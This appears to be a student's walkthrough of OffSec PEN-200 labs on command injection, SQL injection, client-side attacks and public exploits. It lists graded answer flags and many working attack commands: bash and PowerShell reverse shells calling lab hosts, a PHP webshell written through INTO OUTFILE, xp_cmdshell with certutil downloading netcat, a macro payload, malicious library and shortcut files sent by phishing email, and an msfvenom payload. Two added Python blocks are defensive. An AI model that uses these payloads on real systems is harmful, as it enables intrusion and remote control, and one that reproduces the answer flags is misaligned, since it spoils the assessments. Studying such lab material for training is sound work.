We send a request to http://ip:80/, enter something into the input field and check in Burp Suite how it is received.

curl -X POST --data 'Archive=git%3Bls' http://ip:80/archive

We try this first, then:

curl -X POST --data 'Archive=git%3Bsudo%20cat%20/opt/*' http://ip:80/archive

3. Capstone Lab: Start the Future Factor Authentication application on VM #3. Identify the vulnerability, exploit it and
obtain a reverse shell. Use sudo su in the reverse shell to obtain elevated privileges and find the flag located in the
/root/ directory.

Answer

OS{00fad2eb731e908d2a56caaccb5714e1}

View hints

1. Visit VM #3's webserver to find three fields on the login page.
2. Test various inputs like && to identify the command injection vulnerability.
3. Assume the back-end uses a vulnerable function like eval() or popen(): popen(f'echo "test"')

Command

nc -nvlp 4444

We listen with Netcat.

We open Burp and send a request to http://ip/, which redirects us to the /login page; there we fill in all the fields and inspect the request headers in Burp.

Into the ffa field we put the URL-encoded form of bash -c "bash -i >& /dev/tcp/192.168.XX.XX/4444 0>&1":
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22

When we send it, we get a reverse shell at our Netcat listener.

4. Capstone Lab: Enumerate the machine VM #4. Find the web application and get access to the system. The flag can
be found in C:\inetpub\.

Answer

OS{c36f5e292568384919cc65cb526ee9c7}

View hints

1. Nmap to find open HTTP ports.
2. Explore the main page of the ports for file upload.
3. Upload a webshell and identify the web server for server-side scripting (PHP or ASPX).
4. Index page provides hints on locating your webshell.

Command

We scan with nmap.

We open http://ip:8000/, which shows a page that allows uploads; we upload the cmdasp.aspx file there. Opening http://ip:80/cmdasp.aspx then gives us a web shell page from which we can execute commands.
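The four command-injection labs above all hinge on the Archive value being concatenated into a shell command line. The following Python code is an added example, not the Mountain Vaults application's code, contrasting that vulnerable shape with a hardened handler that validates the value against an allowlist pattern and passes it to git as a separate argv element, plus a small detector for the shell separators that appear in the lab payloads. The function names, REF_PATTERN and the exact git invocation are assumptions for illustration.

```python
import re
import subprocess
from urllib.parse import unquote


# Vulnerable shape (constructed, standing in for the back end these labs target):
# the user value is pasted into one shell string, so "git;whoami" runs a second command.
def build_archive_command_vulnerable(archive_name):
    return "git archive --format=zip -o /tmp/out.zip " + archive_name


# Hardened shape: a strict allowlist on the value, and an argv list instead of a shell string.
REF_PATTERN = re.compile(r"[A-Za-z0-9._-]{1,64}")


def is_accepted(archive_name):
    """True if the hardened validator would let this value through."""
    return REF_PATTERN.fullmatch(archive_name) is not None


def build_archive_command_hardened(archive_name):
    if not is_accepted(archive_name):
        raise ValueError("rejected archive name: %r" % archive_name)
    # Each list element is exactly one argv entry, so ';', '&&', '|' and backticks
    # inside archive_name would reach git as data, never a shell as syntax.
    return ["git", "archive", "--format=zip", "-o", "/tmp/out.zip", archive_name]


def run_hardened(archive_name):
    """Execute with shell=False; raises ValueError before anything runs if the name is bad."""
    argv = build_archive_command_hardened(archive_name)
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=30)


SHELL_METACHARS = (";", "&&", "||", "|", "`", "$(", "\n")


def looks_injected(raw_value):
    """Request-log check: decode once and look for the separators used in the lab payloads."""
    decoded = unquote(raw_value)
    return any(tok in decoded for tok in SHELL_METACHARS)


if __name__ == "__main__":
    # Constructed request values; the encoded ones are the form seen in the curl commands above.
    for value in ("git", "git;whoami", "git%3Bls", "git%26%26id"):
        print(value, "injected?", looks_injected(value))
        if is_accepted(value):
            print("  argv:", build_archive_command_hardened(value))
        else:
            print("  rejected by allowlist")
```

The detector is deliberately coarse (a legitimate value containing "|" would trip it), which is the right trade for an alert on a parameter that should only ever hold a reference name; the allowlist regex is what actually stops the injection.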

10. SQL Injection Attacks


10.1.2. DB Types and Characteristics

SQL Injections Attacks - SQL Theory and Databases - MySQL - VM #1

SQL Injections Attacks - SQL Theory and Databases - MSSQL - VM #2

SQL Injections Attacks - SQL Theory and Databases - MySQL - VM #3

Labs
1. From your Kali Linux VM, connect to the remote MySQL instance on VM 1 and replicate the steps to enumerate the MySQL database. Then explore all values assigned to the user offsec. Which plugin value is used as a password authentication scheme?

Answer

caching_sha2_password

View hints

Refer to the query shown in listing 7 and add an additional column to the SELECT statement that retrieves
information about the plugin used.

Command

mysql -u root -p'root' -h 192.168.178.16 -P 3306 --ssl=0

MySQL [(none)]> SELECT plugin, authentication_string FROM mysql.user WHERE user = 'offsec';

2. From your Kali Linux VM, connect to the remote MSSQL instance on VM 2 and replicate the steps to enumerate the MSSQL database. Then explore the records of the sysusers table inside the master database. What is the value of the first user listed?

Answer

public

View hints

HINT

1. Follow the steps in listing 8 to connect to the MSSQL instance.
2. To explore the sysusers table in the master database, use an SQL query that selects all columns from the table.
3. Provide the name of the first listed user as the answer for this exercise.

HINT

1. The sysusers table is a built-in MSSQL system table.
2. Refer to the MSSQL documentation on how to enumerate system tables.

Command

impacket-mssqlclient Administrator:[email protected] -windows-auth

SELECT name FROM sysusers;

3. From your Kali Linux VM, connect to the remote MySQL instance on VM 3 and explore the users table present in one of the databases to get the flag.

Answer

OS{e2bf4f6cff2a8e8a84c65e8971f059a1}

View hints
1. List all the databases by using the SQL query 'show databases'.
2. Switch to the relevant database and use a SELECT * query to retrieve all values from the 'users' table.

Command

mysql -u root -p'root' -h 192.168.178.16 -P 3306 --ssl=0

show databases;

use test;

select * from users;

10.2.3. Blind SQL Injections

SQL Injections Attacks - Manual SQL Exploitation - VM #1

Labs
1. Boot up VM 1 and replicate the SQLi authentication bypass payload we have explored in this Learning Unit. In this section, which PHP variable is used to store the user's input?

Answer

$_POST

View hints

1. Pay attention to the web page login form. Is GET or POST used when you submit your credentials?
2. Once you've identified the method, look for the PHP variable.
3. Refer to the PHP reserved variables.

Command

2. Continue working on VM 1 and replicate the SQLi UNION-based attack we have discussed in this Learning Unit. For the UNION-based attack to succeed, what other condition needs to be satisfied in addition to having the same data types among the two queries?

Answer

same number of columns

View hints

For UNION SQLi attacks to work, we first need to satisfy two conditions:

1. The injected UNION query has to include the same number of columns as the original query.

2. The data types need to match for each column.

Command

no commands

3. Replicate the time-based and boolean-based blind SQL injections described in this Learning Unit on VM 1. Blind SQLi are called like this because the database output is never returned to the user. To infer the result of the query, the output of which component is employed instead?

Answer

web application

View hints

1. Consider where the output of the boolean/blind SQLi queries is observed.
2. Note that the blind SQLi payload directly impacts a particular service, not the database.
3. The answer can be found in this learning unit, highlighted in red.

Command

10.3.2. Automating the Attack

SQL Injections Attacks - Code Execution - MSSQL - VM #1

SQL Injections Attacks - Code Execution - MySQL - VM #2

SQL Injections Attacks - Code Execution - MySQL - VM #3

SQL Injections Attacks - Module Exercise - VM #1

SQL Injections Attacks - Module Exercise - VM #2

SQL Injections Attacks - Module Exercise - VM #3

SQL Injections Attacks - Module Exercise - VM #4

Labs
1. Connect to the MSSQL VM 1 and enable xp_cmdshell as showcased in this Module. Which MSSQL configuration option needs to be enabled before xp_cmdshell can be turned on?

Answer

show advanced options

View hints

Use the commands provided in listing 27 under the Manual Code Execution learning unit.

Command

2. Connect to the MySQL VM 2 and repeat the steps illustrated in this section to manually exploit the UNION-based SQLi. Once you have obtained a webshell, gather the flag that is located in the same tmp folder.

Answer

OS{9ae211424ab9c435ced674e723b2f14b}

View hints

1. Determine the number of columns by using the ORDER BY clause.
2. Once you have determined the number of columns, use the UNION SELECT for simple code execution such as @@version.
3. Use the INTO OUTFILE to write a webshell to /var/www/html/tmp/.

Command

3. Connect to the MySQL VM 3 and automate the SQL injection discovery via sqlmap as shown in this section. Then dump the users table by abusing the time-based blind SQLi and find the flag that is stored in one of the table's records.

Answer

OS{b307fb4948f369b58c5faa589f45b0a4}

View hints

1. Time-based Blind SQLi can be slow, be patient.
2. To speed up the extraction, specify the table name with the -T flag when using sqlmap and adjust concurrency with --threads for faster extraction.
3. Use the --dump flag to extract specific columns.

Command

' UNION SELECT null, username, password, description, null FROM users -- //

4. Capstone Lab: Enumerate the Module Exercise - VM #1 and exploit the SQLi vulnerability to get the flag.

Answer

OS{fcc79dc2e9ef7f3724be5a16808abe21}

View hints

1) Visit the website and add alvida-eatery.org to your hosts file.
2) Analyze the site with tools like Wappalyzer or WhatWeb to identify the CMS (WordPress).
3) Use WPScan to enumerate plugins/themes, searching for known vulnerabilities.
4) Use the POC in https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad/
5) By searching wordpress keywords in https://hashcat.net/wiki/doku.php?id=example_hashes, we will notice that wordpress hashes start with $P$ characters. You should take it into account when you are receiving the output.

Command

I added the IP and alvida-eatery.org to /etc/hosts with nano.

I used this PoC request:

http://example.com/wp-admin/admin-ajax.php?
action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2

curl "http://alvida-eatery.org/wp-admin/admin-ajax.php?action=get_question&question_id=1 union select 1%2C1%

I found a hashed value, saved it to a file, and recovered the password with:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass hashes

I logged into WordPress, uploaded a zipped plugin containing a reverse shell, and found the flag.

5. Capstone Lab: Enumerate the Module Exercise - VM #2 and exploit the SQLi vulnerability to get the flag.

Answer

OS{6c96c9e9dfcbf860b9427b3695eed2f2}

View hints

1. Capture the request of subscribing newsletter with Burp and test the parameter for sqli vulnerability with a
single quote (').

2. Use an ORDER BY query to determine the number of columns in the vulnerable parameter.

3. To find the correct column, you can test the "@@version" payload for each column to check if you are retrieving
the database version.

4. Inject a simple php webshell payload using a "union select" query and "into outfile" write the webshell to the
/var/www/html directory.

5. Access the webshell for RCE and execute commands on the server.

Command

I sent a request to the IP and index.php opened; I entered input into the website's input field and analysed the request in Burp.

' union select null,null,null,null,'<?php system($_GET["cmd"]); ?>',null into outfile '/var/www/html/rce.php'#

I URL-encoded this, submitted it with [email protected] as the email, and then executed commands.

Once rce.php had been written, I opened rce.php instead of index.php and executed commands.

6. Capstone Lab: Enumerate the Module Exercise - VM #3 and
exploit the SQLi vulnerability to get the flag.

Answer
OS{8ef8fc4e05a438792174c2db57dd0985}

View hints
1) Test for SQL injection by adding a single quote (') to each input parameter and check for errors.
2) Based on the error received, check which DBMS you are facing.
3) Based on the target DBMS, try to get code execution.
4) Code execution on the PostgreSQL DBMS is slightly different than on MSSQL or MySQL DBMSes. The COPY statement should be used.
5) Check out CVE-2019-9193:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#command-execution

Command

We inject SQL into the height parameter:

' ; DROP TABLE IF EXISTS commandexec; CREATE TABLE commandexec(data text); COPY commandexec FROM P

We URL-encode this command and put it into the height field. Before sending, we start a Netcat listener in the terminal, then send the request from Burp.

7. Capstone Lab: Enumerate the Module Exercise - VM #4 and
exploit the SQLi vulnerability to get the flag.

Answer

OS{d3cf4fb610ba80eefe0483e2d428351c}

View hints

1. Test username or password fields with a single quote (').
2. Use time-based payloads to identify the DB.
3. Once the db is known, look for specific vulnerabilities to gain further access.
4. For MSSQL, enable xp_cmdshell including advanced options.

Command

We send a request to the IP, enter input into the login form and inspect the request headers in Burp.

We inject SQL here.

You'll need to send the following payloads in 4 requests using Burp Repeater. Remember to use URL-Encoding.

';EXEC sp_configure 'show advanced options', 1;--
';RECONFIGURE;--
';EXEC sp_configure "xp_cmdshell", 1;--
';RECONFIGURE;--

After enabling xp_cmdshell, we will transfer the nc64.exe binary to the target.

Start a Python server on the attacker machine:

┌──(root㉿kali)-[~]
└─$ python3 -m http.server 80

=> In the Burp Suite username parameter:

';EXEC xp_cmdshell "certutil -urlcache -f http://192.168.45.191/nc64.exe c:/windows/temp/nc64.exe";--

Then you need to start a listener and trigger nc64.exe:

';EXECUTE sp_configure "show advanced options", 1;RECONFIGURE;EXECUTE sp_configure "xp_cmdshell", 1;REC

We download nc64.exe and host it from that directory with a server in our terminal:

python3 -m http.server 80

Into UsernameTextBox we execute:

';EXEC xp_cmdshell "certutil -urlcache -f http://192.168.45.191/nc.exe c:/windows/temp/nc.exe";--

This pulls nc64.exe from our host into c:/windows/temp/nc64.exe. We then start Netcat listening:

nc -nvlp 4444

and from Burp Suite we execute the following in UsernameTextBox:

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE

and we get a reverse shell.

I found the flag by following this hint.
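The payload families used across this module (UNION SELECT, INTO OUTFILE, xp_cmdshell and sp_configure, the PostgreSQL COPY FROM PROGRAM statement, and time-based sleep) leave recognisable traces in web server access logs. The following Python script is an added example and not part of the course: it decodes each request URL and tags the line with the indicators it matches. The log lines are constructed samples modelled on the payloads above, and the combined-log-format regex and indicator names are my own choices.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns for the payload families used in this module (names are my own).
SQLI_PATTERNS = {
    "union-select":   re.compile(r"union\s+(all\s+)?select", re.I),
    "file-write":     re.compile(r"into\s+(out|dump)file", re.I),
    "mssql-cmdshell": re.compile(r"xp_cmdshell|sp_configure", re.I),
    "pg-copy":        re.compile(r"copy\s+\w+\s+from\s+program", re.I),
    "time-based":     re.compile(r"\b(sleep|pg_sleep|waitfor\s+delay)\b", re.I),
    "comment-tail":   re.compile(r"(--|#|/\*)\s*$"),
}

# Apache/nginx combined log format: client IP, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_twice(value):
    """Payloads in these labs are sent URL-encoded; decode twice to catch double encoding."""
    return unquote_plus(unquote_plus(value))


def classify_request(url):
    """Return the sorted list of indicator names that match the decoded request URL."""
    decoded = decode_twice(url)
    return sorted(name for name, pattern in SQLI_PATTERNS.items() if pattern.search(decoded))


def scan_log(lines):
    """Return a list of (client_ip, raw_url, indicators) for every line matching a pattern."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if match is None:
            continue
        tags = classify_request(match["url"])
        if tags:
            hits.append((match["ip"], match["url"], tags))
    return hits


# Constructed sample log: one benign request followed by requests modelled on the
# WordPress UNION, INTO OUTFILE, xp_cmdshell and time-based payloads from this module.
SAMPLE_LOG = """\
192.168.45.170 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
192.168.45.170 - - [10/Jan/2024:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201%2C1%2Cuser_login%2Cuser_pass HTTP/1.1" 200 900
192.168.45.170 - - [10/Jan/2024:10:00:03 +0000] "GET /search?q=%27%20union%20select%20null%2C%27%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%27%20into%20outfile%20%27%2Fvar%2Fwww%2Fhtml%2Frce.php%27%23 HTTP/1.1" 500 0
192.168.45.170 - - [10/Jan/2024:10:00:04 +0000] "GET /login?user=%27%3BEXEC%20sp_configure%20%27xp_cmdshell%27%2C%201%3B-- HTTP/1.1" 302 0
192.168.45.170 - - [10/Jan/2024:10:00:05 +0000] "GET /item?id=1%27%20AND%20sleep(5)-- HTTP/1.1" 200 128
"""

if __name__ == "__main__":
    for ip, url, tags in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, tags, url[:60])
```

Most of the labs in this module deliver the payload in a POST body, which a standard access log does not record, so classify_request is meant to be fed from a WAF or application log that captures form fields; the access-log parser is there for the GET cases such as the WordPress admin-ajax request.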

11. Client-side Attacks
11.1.1. Information Gathering

client-side Attacks - Information Gathering - VM #1

client-side Attacks - Information Gathering - VM #2

Labs
1. Download old.pdf from the Mountain Vegetables website on VM #1 by clicking on the OLD button. Use exiftool to review the file's metadata. Enter the value of the Author tag.

Answer
OS{6cef223ba566a9d5d3e39d6f871bd2e8}

View hints

Make sure that you are using wget to download the PDF instead of using the browser's 'print and save to PDF'
option.

Command

We open the IP and download the old.pdf file.

exiftool -a -u old.pdf

This command reveals the flag.

2. Start VM #2 and use gobuster to bruteforce the contents of the web server. Specify "pdf" as the filetype and find a
document other than old.pdf and brochure.pdf. After you identify the file, download it and extract the flag in the
metadata.

Answer

OS{75e42fa30db205cc3c0daed5b5a7eda4}

View hints

1. Consider using the /usr/share/wordlists/dirb/common.txt wordlist.
2. Use the -x parameter in the gobuster command to specify the filetype as PDF.

Command

We brute-force the IP for PDF files with gobuster and view their details with exiftool.

gobuster dir -u 192.168.158.197 -w /usr/share/wordlists/dirb/common.txt -x pdf -t 100

exiftool -a -u info.pdf

11.1.2. Client Fingerprinting

Labs
1. Reproduce the steps from this section by opening the link yourself. Open the link one time with an enabled AdBlocker and one time with a disabled AdBlocker. Answer true or false: There is no difference in the results regarding enabled or disabled AdBlocker.

Answer
false

View hints

no hints

Command

no commands

11.2.1. Preparing the Attack

Labs
1. Answer with true or false: MOTW is not added to files on FAT32-formatted devices.

Answer

true

View hints

no hints

Command

no commands

2. Answer with true or false: After the announced Microsoft change regarding the default macro behavior in Office installations, users will still be able to execute macros with the click of a single button.

Answer

false

View hints

no hints

Command

no commands

3. Answer with true or false: Is it possible to avoid getting a file flagged with MOTW by providing it in container file formats like 7zip, ISO, or IMG? Research if threat actors use these formats to deliver their malware and answer accordingly.

Answer

true

View hints

no hints

Command

no commands

11.2.2. Installing Microsoft Office

client-side-Attacks - Installing Microsoft Office - VM #1

Labs
1. Check which programs Microsoft Office 2019 has installed and complete the following list: Word, PowerPoint, Outlook, Publisher, Access, Excel, and __________.

Answer

OneNote

View hints

1. Click on the Windows icon on the taskbar and click More just right after recommended.
2. What you're looking for is a program related to taking notes.

Command

no commands

11.2.3. Leveraging Microsoft Word Macros

Client-side Attacks - Leveraging Microsoft Word Macros - VM Group 1

Labs
1. Perform the steps from this section to create a malicious Word document containing a macro with the name MyMacro on the OFFICE (VM #1) machine. For this, you have to install Microsoft Office on VM #1 again as outlined in the section "Installing Microsoft Office". Confirm that the macro works as expected by obtaining a reverse shell from the OFFICE machine. What keyword is used to declare a variable in VBA?

Answer

Dim

View hints

1. Watch the video for this learning unit if you encounter difficulties replicating the steps.
2. In VBA, use the keyword for declaring variables.
3. Review the paragraph above listing 5 and the code in listing 5.

Command

2. Once you have confirmed that the macro from the previous exercise works, upload the document containing the
macro MyMacro in the file upload form (port 8000) of the TICKETS (VM #2) machine with the name ticket.doc. A script
on the machine, simulating a user, checks for this file and executes it. After receiving a reverse shell, enter the flag from
the flag.txt file on the desktop for the Administrator user. For the file upload functionality, add tickets.com with the
corresponding IP address in /etc/hosts. Please note that it can take up to three minutes after uploading the document
for the macro to get executed.

Answer

OS{01fe98f62caaec1e93813a3e63c0c9a9}

View hints

1. Store the macro as shown in Figure 21.

2. Encode the payload in base64 using UTF-16LE, as shown in Listing 32: Common Web Application Attacks :: Using Executable Files.

3. Ensure proper splitting of the encoded string in split.py and no new lines in the file.

4. Use the impacket-smbserver tool to transfer the file to your Kali machine once you've created the malicious
Word file.

5. If you can't access tickets.com after modifying the /etc/hosts file, try accessing the website from the exercise
machine after modifying c:\Windows\System32\Drivers\etc\hosts.

Command

Using the previous VM, we install Microsoft Office from C:, create a Word file, save it as ticket.doc, open it, create a macro named MyMacro and edit it.

We base64-encode the following command as UTF-16LE:

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

We put the encoded data into a Python script that prints it as VBA lines, and paste the script's output into the macro:

# split.py: the full base64 string from the previous step goes in place of the "..."
payload = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."

n = 50

# Emit the payload in 50-character chunks so each VBA line stays short
for i in range(0, len(payload), n):
    print("Str = Str + " + '"' + payload[i:i+n] + '"')

We open cmd.exe and add the IP and domain to c:/windows/system32/drivers/etc/hosts.

Before uploading ticket.doc at ip:8000 in the browser, we start nc on our own machine and an HTTP server inside /usr/share/powershell-empire/empire/server/data/module_source/management so that powercat.ps1 can be fetched.

We upload the file and wait; after receiving the reverse shell, we find the flag.

11.3.1. Obtaining Code Execution via Windows Library Files

Client-side Attacks - Abusing Windows Library Files - VM Group 1

Client-side Attacks - Abusing Windows Library Files - VM Group 2

Labs
1. Follow the steps in this section to get code execution on the
HR137 (VM Group 1 - VM #2) system by using library and shortcut files. Be aware that after every execution of a .lnk file
from the WebDAV share, the library file from the SMB share will be removed. You can find the flag on the desktop of the
hsmith user. You can use VM #1 of VM Group 1 to build the library file and shortcut.

Answer

OS{72550776f213b44bb41ad8900706354d}

View hints

no hints

Command

We install the package that provides the WebDAV server:

pip3 install wsgidav

We create a directory for the web server and start it there:

mkdir /home/kali/webdav
touch /home/kali/webdav/test.txt
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

On the VM provided for building the files, we create the config files in VS Code.

We name the first file config.Library-ms:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.119.2</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

The second file is a shortcut that runs a PowerShell script; we name it automatic_configuration:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1'); powercat -c 192.168.119.3 -p 4444 -e powershell"

We run wsgidav on port 80, the Python HTTP server on port 8000, and listen on port 4444 with nc.

smbclient //192.168.50.195/share -c 'put config.Library-ms'

With this we send our config file over SMB, and we get a reverse shell.

2. Answer the following question with true or false: Is the .lnk file tagged with the "Mark of the Web" when you execute
it in Explorer by double-clicking the Windows library file?

Answer

true

View hints

no hints

Command

no commands

3. Capstone Lab: Enumerate the ADMIN (VM Group 2 - VM #4) machine and find a way to leverage Windows library and shortcut files to get code execution. Obtain a reverse shell and find the flag on the desktop for the Administrator user. You can use VM #3 of VM Group 2 to prepare your attack.

Answer

OS{07b19cd103dcbb9ce224273f2fd05c60}

View hints

1. Scan the ports with nmap.

2. Start by fuzzing the webserver for some hidden files (pdf,txt) using gobuster or ffuf.

3. Download any files you have found directly with tools like wget for future analysis, such as identifying the creator of the file.

4. Use the commands provided in Listing 11 to host any malicious file and send the email.

5. Make sure you mount the correct path where you have the Webdav folder! Is it root/webdav or
/home/kali/webdav?

6. Do not limit yourself to only one tool; search for other PowerShell reverse shells.

Command
Dear learners,
I'm sharing some insights on Learning Module 11.3.1 Capstone labs

STEP I - Preparing the 2 files for the attack on WinPrep

NOTE : Don’t start yet the wsgidav server , that way you DON’T open the config-Library.ms by accident in your WinPrep
machine (when you open it will change the meta in the file cause it connects to the wsgidav server)

1. Connect to RDP on WinPrep and you will share your TMP folder with the machine (that way you copy-paste the
2 files we will create - config.Library-ms and automatic_configuration.lnk )

xfreerdp /u:offsec /p:lab /v:192.168.X.194 /drive:/tmp

1. Open VS-Code and create an empty text file on the desktop and name it config.Library-ms , close VS-Code (wait for
the file to appear, it looks like in the video a folder with a blank file behind it)

2. Right-click -> Open with -> VS-Code. Now copy Listing 17 - Windows Library code for connecting to our
WebDAV Share (change the IP with your tun0) then save the file and exit VS-Code (now in 1-2 seconds ICON
should change to a blue one, meaning all went good so far!)

*NOTE: **DON’T double click the new file, else inside it will change, like leave it like that!

1. Now it's time to create the Shortcut: Right-Click on Desktop -> New -> Shortcut. On the type of location you
copy paste FULL command from Listing 18 - PowerShell Download Cradle and PowerCat Reverse Shell
Execution (make sure to change both IPs with your tun0 IP)

NOTE: When you copy-paste Listing 18 it will not take full one-liner, but only first command, so make sure you insert
both commands (else will stop at “;” which ends the 1st command)

1. Copy-paste to your shared TMP: File Explorer -> This PC -> _tmp on Kali.
Now both files are transferred with integrity on your own Kali. Move them to
/home/kali/webdav from /tmp

(on your Kali)

OSCP PEN-200 82
cd /home/kali/webdavcp /tmp/automatic_configuration.lnk .cp /tmp/config.Library-ms .

*STEP II - Wsgidav + Python3 HTTP Server + Swaks attack **

Capstones are meant to be done after you are done with the training material and you bounce back to sharpen
your skills with this type of exercise called capstones!
Swaks is learned in module 24, so if you want to do the capstone observe carefully the videos regarding Swaks
- 25.3.2. Phishing for Access *

Follow the exact steps as Kali user (not root) to install wsgidav

1. After you create the webdav folder at /home/kali/webdav and copy-pasted both files in the same folder like I showed
upper, make sure you add **powercat.ps1 **there, including a new file named body.txt (content can be
anything)
**NOTE: **You should have by now 4 files there :
automatic_configuration.lnk , config.Library-ms , powercat.ps1 and body.txt

2. Make sure to open `wsgidav sharing the webdav folder where you have the files

/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

NOTE: Do a test on your Kali Browser and go to http://tun0_IP ! If you see the wsgidav server you are good until
here!

3. In the same webdav folder, start the Python3 HTTP server (to be safe I usually recommend opening the folder, right-
clicking on it, and opening a terminal there)
python3 -m http.server 8000

NOTE: Wsgidav is hosted on port 80 and Python3 HTTP Server is opened on port 8000!

4. Swaks attack (as shown in 25.3.2 Phishing for Access)

sudo swaks -t [email protected] -t [email protected] --from [email protected] --attach @config.Library-m

Run the command from the same folder where you have all 4 files, i.e. /home/kali/webdav
(otherwise it fails to attach config.Library-ms and body.txt when you execute it!)

12. Locating Public Exploits


12.1.1. A Word of Caution

Labs
1. True/False: It is important to read the code of an exploit before
executing it.

Answer

true

View hints

no hints

Command

no commands

2. What is a way to safely test an exploit? (Enter the letter
corresponding with the answer)

A. Execute the exploit on our Kali host during an engagement
B. Execute the exploit on a target host in the penetration test engagement
C. Execute the exploit in a controlled virtual machine environment to
observe its behavior
D. Distribute the exploit and ask for feedback

Answer

View hints

no hints

Command

no commands

12.2.1. The Exploit Database

Labs
1. True/False: Exploit DB is free to access and use.

Answer

true

View hints

no hints

Command

no commands

2. Which field designates the type of system the exploit impacts?

Answer

Platform

View hints

no hints

Command

no commands

3. Which of the following is not a valid exploit type? (Enter the
letter corresponding with the answer)
A. dos
B. local
C. remote
D. compiled
E. webapp

Answer

View hints

no hints

Command

no commands

4. Who are the authors of the exploit with the EDB-ID of 35273? (Keep
the same format as listed on Exploit DB)

Answer

ryujin & sickness

View hints

no hints

Command

no commands

5. True/False: The EDB Verified checkmark means that a trusted
individual reviewed, executed, and determined that the exploit works.

Answer

true

View hints

no hints

Command

no commands

12.3.1. Exploit Frameworks

Labs
1. True/False: There is a free version of Metasploit available for
public use.

Answer

true

View hints

no hints

Command
no commands

2. What company made Canvas?

Answer

Immunity

View hints

no hints

Command

no commands

12.3.2. SearchSploit

Labs
1. What package must be installed to use searchsploit and have an
updated copy of the Exploit Database?

Answer

exploitdb

View hints

no hints

Command

no commands

2. What is the searchsploit command to search for the following terms:
php, webdav, windows? (Enter the full command with the search terms in
order)

Answer

searchsploit php webdav windows

View hints

no hints

Command

no commands

3. What searchsploit option allows us to copy a found exploit to the
current working directory?

Answer

-m

View hints

no hints

Command

no commands

4. Using searchsploit, find the EDB-ID of the exploit with the title
of "Arm Whois 3.11 - Buffer Overflow (SEH)".

Answer

45796

View hints

no hints

Command

no commands

5. Copy the exploit with the EDB-ID of 45796. What is the affected
software version? (Provide only the numbers)

Answer

3.11

View hints

no hints

Command

no commands

6. What is the EDB-ID of the Eternal Blue exploit that targets Windows 2012 x64?

Answer
42030

View hints
no hints

Command

no commands

7. What is the EDB-ID of the privilege escalation exploit against Linux Kernel 2.6.22 using SUID?

Answer

40616

View hints
no hints

Command
no commands

8. What is the EDB-ID of the Linux SquirrelMail Remote Command Execution Metasploit module?

Answer

16888

View hints

no hints

Command

no commands

9. What is the EDB-ID of the HTML Injection exploit for WebCT 4.1.5?

Answer

31337

View hints

no hints

Command

no commands

10. What is the EDB-ID of the Remote Keylogger Bind Shellcode generator for Windows x64?

Answer
45743

View hints

no hints

Command

no commands

12.3.3. Nmap NSE Scripts

Labs
1. True/False: All Nmap NSE scripts are able to execute exploits.

Answer

false

View hints

no hints

Command

no commands

2. What is an easy string to grep for to find which NSE scripts are
exploits?

Answer

exploit

View hints

Just add the grep string, not the full command. NSE scripts that contain exploits will have what string in their name?

Command

no commands

3. On Kali, where are the Nmap NSE scripts located? (Provide the full
default path)

Answer

/usr/share/nmap/scripts

View hints

no hints

Command

no commands

4. What option in nmap can we use to get more information about an Nmap
NSE script?

Answer
--script-help

View hints

no hints

Command

no commands

12.4.1. Putting It Together

PublicExploitsWalkthrough

PublicExploits01

PublicExploits02

PublicExploits03

Labs
1. Start and exploit the
PublicExploits01 machine.

Answer
intruder

View hints
Check the downloads folder on the machine and aggregate the information from that with the ports that are open.

1) Scan for SMB services, interact with the shares and pay attention to applications you find in the Downloads folder.
2) Google the application name based on the installer file discovered earlier. When searching for
exploits, keep in mind that the version of the application the exploit author used may be older, but that doesn't mean
newer versions are not vulnerable to that exploit.
3) Use msfvenom to generate a payload such as the following:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=<PORT> -f exe > reverse.exe

4) If you are unable to get a reverse shell after setting everything up properly, you may want to modify your MTU by
executing the following: sudo ifconfig tun0 mtu 1250. There may be a bit of delay depending on the VPN connection.
5) Use python2 instead.
6) If you use ExploitDB#50972, python3 should be fine.

Command

nmap -sVC -T4 192.168.117.10

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.238 LPORT=5555 -f exe > reverse.exe

python3 -m http.server 80

nc -nlvp 5555

python3 50972.py 192.168.117.10 192.168.45.238 reverse.exe

2. Start and exploit the PublicExploits02 machine.

Answer

intruder

View hints

